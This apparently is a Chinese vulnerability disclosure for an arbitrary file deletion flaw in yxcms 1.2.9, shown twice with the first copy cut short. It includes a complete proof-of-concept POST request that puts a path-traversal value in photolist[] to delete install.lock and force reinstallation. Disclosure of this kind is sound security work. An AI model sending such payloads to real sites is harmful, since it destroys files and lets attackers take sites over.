<p>yxcms1.2.9版本存在任意文件删除漏洞。<br></p><p>漏洞文件:/protected/apps/member/controller/photocontroller.php</p><p>添加图集时直接获取图片列表,然后进行入库,对图集进行删除时未对删除图片的路径进行任何过滤,如果文件路径存在,就将上传的文件列表进行遍历删除,在类的初始化有个$this->uploadpath=ROOT_PATH.'upload/photos/';,可以在上传时将上传路径设置为../../protected/apps/install/install.lock,进行删除时,由于判断该文件存在,所以会被删除,删除install.lock可以导致重装。也可以替换为其他文件,导致任意文件删除。</p><p><br></p><p>利用方法,注册一个会员然后添加一个图集。</p><p>提交:</p><pre class="lang-html" data-lang="html">POST /index.php?r=member/photo/add HTTP/1.1 Host: localhostUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://localhost/index.php?r=member/photo/add Cookie: bbs_sid=34cf0a07df3b79fb; a8850_times=1; PHPSESSID=70a6e5039d8221ea68474b07eaef8db4; yx_auth=cb4772IT9B%2FSSgobsYj8GrQvKTHczJmS4ZxPdpN58dJKU360qdaxppL9eHsyfxoEN2ThpZKPZ%2FUPuCTcSKajRg...
<p>yxcms1.2.9版本存在任意文件删除漏洞。<br></p><p>漏洞文件:/protected/apps/member/controller/photocontroller.php</p><p>添加图集时直接获取图片列表,然后进行入库,对图集进行删除时未对删除图片的路径进行任何过滤,如果文件路径存在,就将上传的文件列表进行遍历删除,在类的初始化有个$this->uploadpath=ROOT_PATH.'upload/photos/';,可以在上传时将上传路径设置为../../protected/apps/install/install.lock,进行删除时,由于判断该文件存在,所以会被删除,删除install.lock可以导致重装。也可以替换为其他文件,导致任意文件删除。</p><p><br></p><p>利用方法,注册一个会员然后添加一个图集。</p><p>提交:</p><pre class="lang-html" data-lang="html">POST /index.php?r=member/photo/add HTTP/1.1 Host: localhostUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://localhost/index.php?r=member/photo/add Cookie: bbs_sid=34cf0a07df3b79fb; a8850_times=1; PHPSESSID=70a6e5039d8221ea68474b07eaef8db4; yx_auth=cb4772IT9B%2FSSgobsYj8GrQvKTHczJmS4ZxPdpN58dJKU360qdaxppL9eHsyfxoEN2ThpZKPZ%2FUPuCTcSKajRg Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 287 sort=%2C000000%2C100002%2C100007&title=testtest3&sort=sef&picture=teste&keywords=testes&description=testes&ifthumb=1&thumbtype=1&width=145&height=110&content=sefsesfes&tpcontent=photo_content&photolist[]=../../protected/apps/install/install.lock</pre><p><br></p><p>然后删除图集,就能删除安装文件了</p>
